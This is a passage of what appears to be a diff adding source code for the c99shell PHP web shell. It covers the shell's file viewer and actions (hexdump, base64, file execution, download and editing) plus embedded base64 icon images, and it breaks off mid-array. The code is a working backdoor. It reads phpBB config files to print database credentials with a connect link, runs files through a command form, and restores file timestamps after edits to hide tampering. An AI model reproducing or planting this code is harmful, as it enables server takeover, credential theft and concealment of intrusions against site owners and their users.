(in_array($ext,$v)) {$rft = $k; break;}} + if (eregi("sess_(.*)",$f)) {$rft = "phpsess";} + if (empty($ft)) {$ft = $rft;} + $arr = array( + array("<img src=\"".$surl."act=img&img=ext_diz\" border=\"0\">","info"), + array("<img src=\"".$surl."act=img&img=ext_html\" border=\"0\">","html"), + array("<img src=\"".$surl."act=img&img=ext_txt\" border=\"0\">","txt"), + array("Code","code"), + array("Session","phpsess"), + array("<img src=\"".$surl."act=img&img=ext_exe\" border=\"0\">","exe"), + array("SDB","sdb"), + array("<img src=\"".$surl."act=img&img=ext_gif\" border=\"0\">","img"), + array("<img src=\"".$surl."act=img&img=ext_ini\" border=\"0\">","ini"), + array("<img src=\"".$surl."act=img&img=download\" border=\"0\">","download"), + array("<img src=\"".$surl."act=img&img=ext_rtf\" border=\"0\">","notepad"), + array("<img src=\"".$surl."act=img&img=change\" border=\"0\">","edit") + ); + echo "<b>Viewing file: <img src=\"".$surl."act=img&img=ext_".$ext."\" border=\"0\"> ".$f." (".view_size(filesize($d.$f)).") ".view_perms_color($d.$f)."</b><br>Select action/file-type:<br>"; + foreach($arr as $t) + { + if ($t[1] == $rft) {echo " <a href=\"".$surl."act=f&f=".urlencode($f)."&ft=".$t[1]."&d=".urlencode($d)."\"><font color=green>".$t[0]."</font></a>";} + elseif ($t[1] == $ft) {echo " <a href=\"".$surl."act=f&f=".urlencode($f)."&ft=".$t[1]."&d=".urlencode($d)."\"><b><u>".$t[0]."</u></b></a>";} + else {echo " <a href=\"".$surl."act=f&f=".urlencode($f)."&ft=".$t[1]."&d=".urlencode($d)."\"><b>".$t[0]."</b></a>";} + echo " (<a href=\"".$surl."act=f&f=".urlencode($f)."&ft=".$t[1]."&white=1&d=".urlencode($d)."\" target=\"_blank\">+</a>) |"; + } + echo "<hr size=\"1\" noshade>"; + if ($ft == "info") + { + echo "<b>Information:</b><table border=0 cellspacing=1 cellpadding=2><tr><td><b>Path</b></td><td> ".$d.$f."</td></tr><tr><td><b>Size</b></td><td> ".view_size(filesize($d.$f))."</td></tr><tr><td><b>MD5</b></td><td> ".md5_file($d.$f)."</td></tr>"; + if (!$win) + { + echo "<tr><td><b>Owner/Group</b></td><td> "; + $ow = posix_getpwuid(fileowner($d.$f)); + $gr = posix_getgrgid(filegroup($d.$f)); + echo ($ow["name"]?$ow["name"]:fileowner($d.$f))."/".($gr["name"]?$gr["name"]:filegroup($d.$f)); + } + echo "<tr><td><b>Perms</b></td><td><a href=\"".$surl."act=chmod&f=".urlencode($f)."&d=".urlencode($d)."\">".view_perms_color($d.$f)."</a></td></tr><tr><td><b>Create time</b></td><td> ".date("d/m/Y H:i:s",filectime($d.$f))."</td></tr><tr><td><b>Access time</b></td><td> ".date("d/m/Y H:i:s",fileatime($d.$f))."</td></tr><tr><td><b>MODIFY time</b></td><td> ".date("d/m/Y H:i:s",filemtime($d.$f))."</td></tr></table><br>"; + $fi = fopen($d.$f,"rb"); + if ($fi) + { + if ($fullhexdump) {echo "<b>FULL HEXDUMP</b>"; $str = fread($fi,filesize($d.$f));} + else {echo "<b>HEXDUMP PREVIEW</b>"; $str = fread($fi,$hexdump_lines*$hexdump_rows);} + $n = 0; + $a0 = "00000000<br>"; + $a1 = ""; + $a2 = ""; + for ($i=0; $i<strlen($str); $i++) + { + $a1 .= sprintf("%02X",ord($str[$i]))." "; + switch (ord($str[$i])) + { + case 0: $a2 .= "<font>0</font>"; break; + case 32: + case 10: + case 13: $a2 .= " "; break; + default: $a2 .= htmlspecialchars($str[$i]); + } + $n++; + if ($n == $hexdump_rows) + { + $n = 0; + if ($i+1 < strlen($str)) {$a0 .= sprintf("%08X",$i+1)."<br>";} + $a1 .= "<br>"; + $a2 .= "<br>"; + } + } + //if ($a1 != "") {$a0 .= sprintf("%08X",$i)."<br>";} + echo "<table border=0 bgcolor=#666666 cellspacing=1 cellpadding=4><tr><td bgcolor=#666666>".$a0."</td><td bgcolor=000000>".$a1."</td><td bgcolor=000000>".$a2."</td></tr></table><br>"; + } + $encoded = ""; + if ($base64 == 1) + { + echo "<b>Base64 Encode</b><br>"; + $encoded = base64_encode(file_get_contents($d.$f)); + } + elseif($base64 == 2) + { + echo "<b>Base64 Encode + Chunk</b><br>"; + $encoded = chunk_split(base64_encode(file_get_contents($d.$f))); + } + elseif($base64 == 3) + { + echo "<b>Base64 Encode + Chunk + Quotes</b><br>"; + $encoded = base64_encode(file_get_contents($d.$f)); + $encoded = substr(preg_replace("!.{1,76}!","'\\0'.\n",$encoded),0,-2); + } + elseif($base64 == 4) + { + $text = file_get_contents($d.$f); + $encoded = base64_decode($text); + echo "<b>Base64 Decode"; + if (base64_encode($encoded) != $text) {echo " (failed)";} + echo "</b><br>"; + } + if (!empty($encoded)) + { + echo "<textarea cols=80 rows=10>".htmlspecialchars($encoded)."</textarea><br><br>"; + } + echo "<b>HEXDUMP:</b><nobr> [<a href=\"".$surl."act=f&f=".urlencode($f)."&ft=info&fullhexdump=1&d=".urlencode($d)."\">Full</a>] [<a href=\"".$surl."act=f&f=".urlencode($f)."&ft=info&d=".urlencode($d)."\">Preview</a>]<br><b>Base64: </b> +<nobr>[<a href=\"".$surl."act=f&f=".urlencode($f)."&ft=info&base64=1&d=".urlencode($d)."\">Encode</a>] </nobr> +<nobr>[<a href=\"".$surl."act=f&f=".urlencode($f)."&ft=info&base64=2&d=".urlencode($d)."\">+chunk</a>] </nobr> +<nobr>[<a href=\"".$surl."act=f&f=".urlencode($f)."&ft=info&base64=3&d=".urlencode($d)."\">+chunk+quotes</a>] </nobr> +<nobr>[<a href=\"".$surl."act=f&f=".urlencode($f)."&ft=info&base64=4&d=".urlencode($d)."\">Decode</a>] </nobr> +<P>"; + } + elseif ($ft == "html") + { + if ($white) {@ob_clean();} + echo $r; + if ($white) {c99shexit();} + } + elseif ($ft == "txt") {echo "<pre>".htmlspecialchars($r)."</pre>";} + elseif ($ft == "ini") {echo "<pre>"; var_dump(parse_ini_file($d.$f,true)); echo "</pre>";} + elseif ($ft == "phpsess") + { + echo "<pre>"; + $v = explode("|",$r); + echo $v[0]."<br>"; + var_dump(unserialize($v[1])); + echo "</pre>"; + } + elseif ($ft == "exe") + { + $ext = explode(".",$f); + $c = count($ext)-1; + $ext = $ext[$c]; + $ext = strtolower($ext); + $rft = ""; + foreach($exeftypes as $k=>$v) + { + if (in_array($ext,$v)) {$rft = $k; break;} + } + $cmd = str_replace("%f%",$f,$rft); + echo "<b>Execute file:</b><form action=\"".$surl."\" method=POST><input type=hidden name=act value=cmd><input type=\"text\" name=\"cmd\" value=\"".htmlspecialchars($cmd)."\" size=\"".(strlen($cmd)+2)."\"><br>Display in text-area<input type=\"checkbox\" name=\"cmd_txt\" value=\"1\" checked><input type=hidden name=\"d\" value=\"".htmlspecialchars($d)."\"><br><input type=submit name=submit value=\"Execute\"></form>"; + } + elseif ($ft == "sdb") {echo "<pre>"; var_dump(unserialize(base64_decode($r))); echo "</pre>";} + elseif ($ft == "code") + { + if (ereg("php"."BB 2.(.*) auto-generated config file",$r)) + { + $arr = explode("\n",$r); + if (count($arr == 18)) + { + include($d.$f); + echo "<b>phpBB configuration is detected in this file!<br>"; + if ($dbms == "mysql4") {$dbms = "mysql";} + if ($dbms == "mysql") {echo "<a href=\"".$surl."act=sql&sql_server=".htmlspecialchars($dbhost)."&sql_login=".htmlspecialchars($dbuser)."&sql_passwd=".htmlspecialchars($dbpasswd)."&sql_port=3306&sql_db=".htmlspecialchars($dbname)."\"><b><u>Connect to DB</u></b></a><br><br>";} + else {echo "But, you can't connect to forum sql-base, because db-software=\"".$dbms."\" is not supported by c99shell. Please, report us for fix.";} + echo "Parameters for manual connect:<br>"; + $cfgvars = array("dbms"=>$dbms,"dbhost"=>$dbhost,"dbname"=>$dbname,"dbuser"=>$dbuser,"dbpasswd"=>$dbpasswd); + foreach ($cfgvars as $k=>$v) {echo htmlspecialchars($k)."='".htmlspecialchars($v)."'<br>";} + echo "</b><hr size=\"1\" noshade>"; + } + } + echo "<div style=\"border : 0px solid #FFFFFF; padding: 1em; margin-top: 1em; margin-bottom: 1em; margin-right: 1em; margin-left: 1em; background-color: ".$highlight_background .";\">"; + if (!empty($white)) {@ob_clean();} + highlight_file($d.$f); + if (!empty($white)) {c99shexit();} + echo "</div>"; + } + elseif ($ft == "download") + { + @ob_clean(); + header("Content-type: application/octet-stream"); + header("Content-length: ".filesize($d.$f)); + header("Content-disposition: attachment; filename=\"".$f."\";"); + echo $r; + exit; + } + elseif ($ft == "notepad") + { + @ob_clean(); + header("Content-type: text/plain"); + header("Content-disposition: attachment; filename=\"".$f.".txt\";"); + echo($r); + exit; + } + elseif ($ft == "img") + { + $inf = getimagesize($d.$f); + if (!$white) + { + if (empty($imgsize)) {$imgsize = 20;} + $width = $inf[0]/100*$imgsize; + $height = $inf[1]/100*$imgsize; + echo "<center><b>Size:</b> "; + $sizes = array("100","50","20"); + foreach ($sizes as $v) + { + echo "<a href=\"".$surl."act=f&f=".urlencode($f)."&ft=img&d=".urlencode($d)."&imgsize=".$v."\">"; + if ($imgsize != $v ) {echo $v;} + else {echo "<u>".$v."</u>";} + echo "</a> "; + } + echo "<br><br><img src=\"".$surl."act=f&f=".urlencode($f)."&ft=img&white=1&d=".urlencode($d)."\" width=\"".$width."\" height=\"".$height."\" border=\"1\"></center>"; + } + else + { + @ob_clean(); + $ext = explode($f,"."); + $ext = $ext[count($ext)-1]; + header("Content-type: ".$inf["mime"]); + readfile($d.$f); + exit; + } + } + elseif ($ft == "edit") + { + if (!empty($submit)) + { + if ($filestealth) {$stat = stat($d.$f);} + $fp = fopen($d.$f,"w"); + if (!$fp) {echo "<b>Can't write to file!</b>";} + else + { + echo "<b>Saved!</b>"; + fwrite($fp,$edit_text); + fclose($fp); + if ($filestealth) {touch($d.$f,$stat[9],$stat[8]);} + $r = $edit_text; + } + } + $rows = count(explode("\r\n",$r)); + if ($rows < 10) {$rows = 10;} + if ($rows > 30) {$rows = 30;} + echo "<form action=\"".$surl."act=f&f=".urlencode($f)."&ft=edit&d=".urlencode($d)."\" method=POST><input type=submit name=submit value=\"Save\"> <input type=\"reset\" value=\"Reset\"> <input type=\"button\" onclick=\"location.href='".addslashes($surl."act=ls&d=".substr($d,0,-1))."';\" value=\"Back\"><br><textarea name=\"edit_text\" cols=\"122\" rows=\"".$rows."\">".htmlspecialchars($r)."</textarea></form>"; + } + elseif (!empty($ft)) {echo "<center><b>Manually selected type is incorrect. If you think, it is mistake, please send us url and dump of \$GLOBALS.</b></center>";} + else {echo "<center><b>Unknown extension (".$ext."), please, select type manually.</b></center>";} + } +} +} +else +{ + @ob_clean(); + $images = array( +"arrow_ltr"=> +"R0lGODlhJgAWAIAAAAAAAP///yH5BAUUAAEALAAAAAAmABYAAAIvjI+py+0PF4i0gVvzuVxXDnoQ". +"SIrUZGZoerKf28KjPNPOaku5RfZ+uQsKh8RiogAAOw==", +"back"=> +"R0lGODlhFAAUAKIAAAAAAP///93d3cDAwIaGhgQEBP///wAAACH5BAEAAAYALAAAAAAUABQAAAM8". +"aLrc/jDKSWWpjVysSNiYJ4CUOBJoqjniILzwuzLtYN/3zBSErf6kBW+gKRiPRghPh+EFK0mOUEqt". +"Wg0JADs=", +"buffer"=> +"R0lGODlhFAAUAKIAAAAAAP////j4+N3d3czMzLKysoaGhv///yH5BAEAAAcALAAAAAAUABQAAANo". +"eLrcribG90y4F1Amu5+NhY2kxl2CMKwrQRSGuVjp4LmwDAWqiAGFXChg+xhnRB+ptLOhai1crEmD". +"Dlwv4cEC46mi2YgJQKaxsEGDFnnGwWDTEzj9jrPRdbhuG8Cr/2INZIOEhXsbDwkAOw==", +"change"=> +"R0lGODlhFAAUAMQfAL3hj7nX+pqo1ejy/f7YAcTb+8vh+6FtH56WZtvr/RAQEZecx9Ll/PX6/v3+". +"/3eHt6q88eHu/ZkfH3yVyIuQt+72/kOm99fo/P8AZm57rkGS4Hez6pil9oep3GZmZv///yH5BAEA". +"AB8ALAAAAAAUABQAAAWf4CeOZGme6NmtLOulX+c4TVNVQ7e9qFzfg4HFonkdJA5S54cbRAoFyEOC". +"wSiUtmYkkrgwOAeA5zrqaLldBiNMIJeD266XYTgQDm5Rx8mdG+oAbSYdaH4Ga3c8JBMJaXQGBQgA". +"CHkjE4aQkQ0AlSITan+ZAQqkiiQPj1AFAaMKEKYjD39QrKwKAa8nGQK8Agu/CxTCsCMexsfIxjDL". +"zMshADs=", +"delete"=> +"R0lGODlhFAAUAOZZAPz8/NPFyNgHLs0YOvPz8/b29sacpNXV1fX19cwXOfDw8Kenp/n5+etgeunp". +"6dcGLMMpRurq6pKSktvb2+/v7+1wh3R0dPnP17iAipxyel9fX7djcscSM93d3ZGRkeEsTevd4LCw". +"sGRkZGpOU+IfQ+EQNoh6fdIcPeHh4YWFhbJQYvLy8ui+xm5ubsxccOx8kcM4UtY9WeAdQYmJifWv". +"vHx8fMnJycM3Uf3v8rRue98ONbOzs9YFK5SUlKYoP+Tk5N0oSufn57ZGWsQrR9kIL5CQkOPj42Vl". +"ZeAPNudAX9sKMPv7+15QU5ubm39/f8e5u4xiatra2ubKz8PDw+pfee9/lMK0t81rfd8AKf///wAA". +"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". +"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACH5". +"BAEAAFkALAAAAAAUABQAAAesgFmCg4SFhoeIhiUfIImIMlgQB46GLAlYQkaFVVhSAIZLT5cbEYI4". +"STo5MxOfhQwBA1gYChckQBk1OwiIALACLkgxJilTBI69RFhDFh4HDJRZVFgPPFBR0FkNWDdMHA8G". +"BZTaMCISVgMC4IkVWCcaPSi96OqGNFhKI04dgr0QWFcKDL3A4uOIjVZZABxQIWDBLkIEQrRoQsHQ". +"jwVFHBgiEGQFIgQasYkcSbJQIAA7", +"download"=> +"R0lGODlhFAAUALMIAAD/AACAAIAAAMDAwH9/f/8AAP///wAAAP///wAAAAAAAAAAAAAAAAAAAAAA". +"AAAAACH5BAEAAAgALAAAAAAUABQAAAROEMlJq704UyGOvkLhfVU4kpOJSpx5nF9YiCtLf0SuH7pu". +"EYOgcBgkwAiGpHKZzB2JxADASQFCidQJsMfdGqsDJnOQlXTP38przWbX3qgIADs=", +"forward"=> +"R0lGODlhFAAUAPIAAAAAAP///93d3cDAwIaGhgQEBP///wAAACH5BAEAAAYALAAAAAAUABQAAAM8". +"aLrc/jDK2Qp9xV5WiN5G50FZaRLD6IhE66Lpt3RDbd9CQFSE4P++QW7He7UKPh0IqVw2l0RQSEqt". +"WqsJADs=", +"home"=> +"R0lGODlhFAAUALMAAAAAAP///+rq6t3d3czMzLKysoaGhmZmZgQEBP///wAAAAAAAAAAAAAAAAAA". +"AAAAACH5BAEAAAkALAAAAAAUABQAAAR+MMk5TTWI6ipyMoO3cUWRgeJoCCaLoKO0mq0ZxjNSBDWS". +"krqAsLfJ7YQBl4tiRCYFSpPMdRRCoQOiL4i8CgZgk09WfWLBYZHB6UWjCequwEDHuOEVK3QtgN/j". +"VwMrBDZvgF+ChHaGeYiCBQYHCH8VBJaWdAeSl5YiW5+goBIRADs=", +"mode"=> +"R0lGODlhHQAUALMAAAAAAP///6CgpN3d3czMzIaGhmZmZl9fX////wAAAAAAAAAAAAAAAAAAAAAA". +"AAAAACH5BAEAAAgALAAAAAAdABQAAASBEMlJq70461m6/+AHZMUgnGiqniNWHHAsz3F7FUGu73xO". +"2BZcwGDoEXk/Uq4ICACeQ6fzmXTlns0ddle99b7cFvYpER55Z10Xy1lKt8wpoIsACrdaqBpYEYK/". +"dH1LRWiEe0pRTXBvVHwUd3o6eD6OHASXmJmamJUSY5+gnxujpBIRADs=", +"refresh"=> +"R0lGODlhEQAUALMAAAAAAP////Hx8erq6uPj493d3czMzLKysoaGhmZmZl9fXwQEBP///wAAAAAA". +"AAAAACH5BAEAAAwALAAAAAARABQAAAR1kMlJq0Q460xR+GAoIMvkheIYlMyJBkJ8lm6YxMKi6zWY". +"3AKCYbjo/Y4EQqFgKIYUh8EvuWQ6PwPFQJpULpunrXZLrYKx20G3oDA7093Esv19q5O/woFu9ZAJ". +"R3lufmWCVX13h3KHfWWMjGBDkpOUTTuXmJgRADs=", +"search"=> +"R0lGODlhFAAUALMAAAAAAP///+rq6t3d3czMzMDAwLKysoaGhnd3d2ZmZl9fX01NTSkpKQQEBP//". +"/wAAACH5BAEAAA4ALAAAAAAUABQAAASn0Ml5qj0z5xr6+JZGeUZpHIqRNOIRfIYiy+a6vcOpHOap". +"s5IKQccz8XgK4EGgQqWMvkrSscylhoaFVmuZLgUDAnZxEBMODSnrkhiSCZ4CGrUWMA+LLDxuSHsD". +"AkN4C3sfBX10VHaBJ4QfA4eIU4pijQcFmCVoNkFlggcMRScNSUCdJyhoDasNZ5MTDVsXBwlviRmr". +"Cbq7C6sIrqawrKwTv68iyA6rDhEAOw==", +"setup"=> +"R0lGODlhFAAUAMQAAAAAAP////j4+OPj493d3czMzMDAwLKyspaWloaGhnd3d2ZmZl9fX01NTUJC". +"QhwcHP///wAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACH5BAEA". +"ABAALAAAAAAUABQAAAWVICSKikKWaDmuShCUbjzMwEoGhVvsfHEENRYOgegljkeg0PF4KBIFRMIB". +"qCaCJ4eIGQVoIVWsTfQoXMfoUfmMZrgZ2GNDPGII7gJDLYErwG1vgW8CCQtzgHiJAnaFhyt2dwQE". +"OwcMZoZ0kJKUlZeOdQKbPgedjZmhnAcJlqaIqUesmIikpEixnyJhulUMhg24aSO6YyEAOw==", +"small_dir"=> +"R0lGODlhEwAQALMAAAAAAP///5ycAM7OY///nP//zv/OnPf39////wAAAAAAAAAAAAAAAAAAAAAA". +"AAAAACH5BAEAAAgALAAAAAATABAAAARREMlJq7046yp6BxsiHEVBEAKYCUPrDp7HlXRdEoMqCebp". +"/4YchffzGQhH4YRYPB2DOlHPiKwqd1Pq8yrVVg3QYeH5RYK5rJfaFUUA3vB4fBIBADs=", +"small_unk"=> +"R0lGODlhEAAQAHcAACH5BAEAAJUALAAAAAAQABAAhwAAAIep3BE9mllic3B5iVpjdMvh/MLc+y1U". +"p9Pm/GVufc7j/MzV/9Xm/EOm99bn/Njp/a7Q+tTm/LHS+eXw/t3r/Nnp/djo/Nrq/fj7/9vq/Nfo". +"/Mbe+8rh/Mng+7jW+rvY+r7Z+7XR9dDk/NHk/NLl/LTU+rnX+8zi/LbV++fx/e72/vH3/vL4/u31". +"/e31/uDu/dzr/Orz/eHu/fX6/vH4/v////v+/3ez6vf7//T5/kGS4Pv9/7XV+rHT+r/b+rza+vP4". +"/uz0/urz/u71/uvz/dTn/M/k/N3s/dvr/cjg+8Pd+8Hc+sff+8Te+/D2/rXI8rHF8brM87fJ8nmP". +"wr3N86/D8KvB8F9neEFotEBntENptENptSxUpx1IoDlfrTRcrZeeyZacxpmhzIuRtpWZxIuOuKqz". +"9ZOWwX6Is3WIu5im07rJ9J2t2Zek0m57rpqo1nKCtUVrtYir3vf6/46v4Yuu4WZvfr7P6sPS6sDQ". +"66XB6cjZ8a/K79/s/dbn/ezz/czd9mN0jKTB6ai/76W97niXz2GCwV6AwUdstXyVyGSDwnmYz4io". +"24Oi1a3B45Sy4ae944Ccz4Sj1n2GlgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". +"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". +"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". +"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". +"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". +"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". +"AAjnACtVCkCw4JxJAQQqFBjAxo0MNGqsABQAh6CFA3nk0MHiRREVDhzsoLQwAJ0gT4ToecSHAYMz". +"aQgoDNCCSB4EAnImCiSBjUyGLobgXBTpkAA5I6pgmSkDz5cuMSz8yWlAyoCZFGb4SQKhASMBXJpM". +"uSrQEQwkGjYkQCTAy6AlUMhWklQBw4MEhgSA6XPgRxS5ii40KLFgi4BGTEKAsCKXihESCzrsgSQC". +"yIkUV+SqOYLCA4csAup86OGDkNw4BpQ4OaBFgB0TEyIUKqDwTRs4a9yMCSOmDBoyZu4sJKCgwIDj". +"yAsokBkQADs=", +"multipage"=>"R0lGODlhCgAMAJEDAP/////3mQAAAAAAACH5BAEAAAMALAAAAAAKAAwAAAIj3IR". +"pJhCODnovidAovBdMzzkixlXdlI2oZpJWEsSywLzRUAAAOw==", +"sort_asc"=> +"R0lGODlhDgAJAKIAAAAAAP///9TQyICAgP///wAAAAAAAAAAACH5BAEAAAQALAAAAAAOAAkAAAMa". +"SLrcPcE9GKUaQlQ5sN5PloFLJ35OoK6q5SYAOw==", +"sort_desc"=> +"R0lGODlhDgAJAKIAAAAAAP///9TQyICAgP///wAAAAAAAAAAACH5BAEAAAQALAAAAAAOAAkAAAMb". +"SLrcOjBCB4UVITgyLt5ch2mgSJZDBi7p6hIJADs=", +"sql_button_drop"=> +"R0lGODlhCQALAPcAAAAAAIAAAACAAICAAAAAgIAAgACAgICAgMDAwP8AAAD/AP//AAAA//8A/wD/". +"/////wAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". +"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAMwAAZgAAmQAAzAAA/wAzAAAzMwAzZgAzmQAzzAAz/wBm". +"AABmMwBmZgBmmQBmzABm/wCZAACZMwCZZgCZmQCZzACZ/wDMAADMMwDMZgDMmQDMzADM/wD/AAD/". +"MwD/ZgD/mQD/zAD//zMAADMAMzMAZjMAmTMAzDMA/zMzADMzMzMzZjMzmTMzzDMz/zNmADNmMzNm". +"ZjNmmTNmzDNm/zOZADOZMzOZZjOZmTOZzDOZ/zPMADPMMzPMZjPMmTPMzDPM/zP/ADP/MzP/ZjP/". +"mTP/zDP//2YAAGYAM2YAZmYAmWYAzGYA/2YzAGYzM2YzZmYzmWYzzGYz/2ZmAGZmM2ZmZmZmmWZm". +"zGZm/2aZAGaZM2aZZmaZmWaZzGaZ/2bMAGbMM2bMZmbMmWbMzGbM/2b/AGb/M2b/Zmb/mWb/zGb/". +"/5kAAJkAM5kAZpkAmZkAzJkA/5kzAJkzM5kzZpkzmZkzzJkz/5lmAJlmM5lmZplmmZlmzJlm/5mZ". +"AJmZM5mZZpmZmZmZzJmZ/5nMAJnMM5nMZpnMmZnMzJnM/5n/AJn/M5n/Zpn/mZn/zJn//8wAAMwA". +"M8wAZswAmcwAzMwA/8wzAMwzM8wzZswzmcwzzMwz/8xmAMxmM8xmZsxmmcxmzMxm/8yZAMyZM8yZ". +"ZsyZmcyZzMyZ/8zMAMzMM8zMZszMmczMzMzM/8z/AMz/M8z/Zsz/mcz/zMz///8AAP8AM/8AZv8A". +"mf8AzP8A//8zAP8zM/8zZv8zmf8zzP8z//9mAP9mM/9mZv9mmf9mzP9m//+ZAP+ZM/+ZZv+Zmf+Z". +"zP+Z///MAP/MM//MZv/Mmf/MzP/M////AP//M///Zv//mf//zP///yH5BAEAABAALAAAAAAJAAsA". +"AAg4AP8JREFQ4D+CCBOi4MawITeFCg/iQhEPxcSBlFCoQ5Fx4MSKv1BgRGGMo0iJFC2ehHjSoMt/". +"AQEAOw==", +"sql_button_empty"=> +"R0lGODlhCQAKAPcAAAAAAIAAAACAAICAAAAAgIAAgACAgICAgMDAwP8AAAD/AP//AAAA//8A/wD/". +"/////wAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". +"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAMwAAZgAAmQAAzAAA/wAzAAAzMwAzZgAzmQAzzAAz/wBm". +"AABmMwBmZgBmmQBmzABm/wCZAACZMwCZZgCZmQCZzACZ/wDMAADMMwDMZgDMmQDMzADM/wD/AAD/". +"MwD/ZgD/mQD/zAD//zMAADMAMzMAZjMAmTMAzDMA/zMzADMzMzMzZjMzmTMzzDMz/zNmADNmMzNm". +"ZjNmmTNmzDNm/zOZADOZMzOZZjOZmTOZzDOZ/zPMADPMMzPMZjPMmTPMzDPM/zP/ADP/MzP/ZjP/". +"mTP/zDP//2YAAGYAM2YAZmYAmWYAzGYA/2YzAGYzM2YzZmYzmWYzzGYz/2ZmAGZmM2ZmZmZmmWZm". +"zGZm/2aZAGaZM2aZZmaZmWaZzGaZ/2bMAGbMM2bMZmbMmWbMzGbM/2b/AGb/M2b/Zmb/mWb/zGb/". +"/5kAAJkAM5kAZpkAmZkAzJkA/5kzAJkzM5kzZpkzmZkzzJkz/5lmAJlmM5lmZplmmZlmzJlm/5mZ". +"AJmZM5mZZpmZmZmZzJmZ/5nMAJnMM5nMZpnMmZnMzJnM/5n/AJn/M5n/Zpn/mZn/zJn//8wAAMwA". +"M8wAZswAmcwAzMwA/8wzAMwzM8wzZswzmcwzzMwz/8xmAMxmM8xmZsxmmcxmzMxm/8yZAMyZM8yZ". +"ZsyZmcyZzMyZ/8zMAMzMM8zMZszMmczMzMzM/8z/AMz/M8z/Zsz/mcz/zMz///8AAP8AM/8AZv8A". +"mf8AzP8A//8zAP8zM/8zZv8zmf8zzP8z//9mAP9mM/9mZv9mmf9mzP9m//+ZAP+ZM/+ZZv+Zmf+Z". +"zP+Z///MAP/MM//MZv/Mmf/MzP/M////AP//M///Zv//mf//zP///yH5BAEAABAALAAAAAAJAAoA". +"AAgjAP8JREFQ4D+CCBOiMMhQocKDEBcujEiRosSBFjFenOhwYUAAOw==", +"sql_button_insert"=> +"R0lGODlhDQAMAPcAAAAAAIAAAACAAICAAAAAgIAAgACAgICAgMDAwP8AAAD/AP//AAAA//8A/wD/". +"/////wAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". +"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAMwAAZgAAmQAAzAAA/wAzAAAzMwAzZgAzmQAzzAAz/wBm". +"AABmMwBmZgBmmQBmzABm/wCZAACZMwCZZgCZmQCZzACZ/wDMAADMMwDMZgDMmQDMzADM/wD/AAD/". +"MwD/ZgD/mQD/zAD//zMAADMAMzMAZjMAmTMAzDMA/zMzADMzMzMzZjMzmTMzzDMz/zNmADNmMzNm". +"ZjNmmTNmzDNm/zOZADOZMzOZZjOZmTOZzDOZ/zPMADPMMzPMZjPMmTPMzDPM/zP/ADP/MzP/ZjP/". +"mTP/zDP//2YAAGYAM2YAZmYAmWYAzGYA/2YzAGYzM2YzZmYzmWYzzGYz/2ZmAGZmM2ZmZmZmmWZm". +"zGZm/2aZAGaZM2aZZmaZmWaZzGaZ/2bMAGbMM2bMZmbMmWbMzGbM/2b/AGb/M2b/Zmb/mWb/zGb/". +"/5kAAJkAM5kAZpkAmZkAzJkA/5kzAJkzM5kzZpkzmZkzzJkz/5lmAJlmM5lmZplmmZlmzJlm/5mZ". +"AJmZM5mZZpmZmZmZzJmZ/5nMAJnMM5nMZpnMmZnMzJnM/5n/AJn/M5n/Zpn/mZn/zJn//8wAAMwA". +"M8wAZswAmcwAzMwA/8wzAMwzM8wzZswzmcwzzMwz/8xmAMxmM8xmZsxmmcxmzMxm/8yZAMyZM8yZ". +"ZsyZmcyZzMyZ/8zMAMzMM8zMZszMmczMzMzM/8z/AMz/M8z/Zsz/mcz/zMz///8AAP8AM/8AZv8A". +"mf8AzP8A//8zAP8zM/8zZv8zmf8zzP8z//9mAP9mM/9mZv9mmf9mzP9m//+ZAP+ZM/+ZZv+Zmf+Z". +"zP+Z///MAP/MM//MZv/Mmf/MzP/M////AP//M///Zv//mf//zP///yH5BAEAABAALAAAAAANAAwA". +"AAgzAFEIHEiwoMGDCBH6W0gtoUB//1BENOiP2sKECzNeNIiqY0d/FBf+y0jR48eQGUc6JBgQADs=", +"up"=> +"R0lGODlhFAAUALMAAAAAAP////j4+OPj493d3czMzLKysoaGhk1NTf///wAAAAAAAAAAAAAAAAAA". +"AAAAACH5BAEAAAkALAAAAAAUABQAAAR0MMlJq734ns1PnkcgjgXwhcNQrIVhmFonzxwQjnie27jg". +"+4Qgy3XgBX4IoHDlMhRvggFiGiSwWs5XyDftWplEJ+9HQCyx2c1YEDRfwwfxtop4p53PwLKOjvvV". +"IXtdgwgdPGdYfng1IVeJaTIAkpOUlZYfHxEAOw==", +"write"=> +"R0lGODlhFAAUALMAAAAAAP///93d3czMzLKysoaGhmZmZl9fXwQEBP///wAAAAAAAAAAAAAAAAAA". +"AAAAACH5BAEAAAkALAAAAAAUABQAAAR0MMlJqyzFalqEQJuGEQSCnWg6FogpkHAMF4HAJsWh7/ze". +"EQYQLUAsGgM0Wwt3bCJfQSFx10yyBlJn8RfEMgM9X+3qHWq5iED5yCsMCl111knDpuXfYls+IK61". +"LXd+WWEHLUd/ToJFZQOOj5CRjiCBlZaXIBEAOw==", +"ext_asp"=> 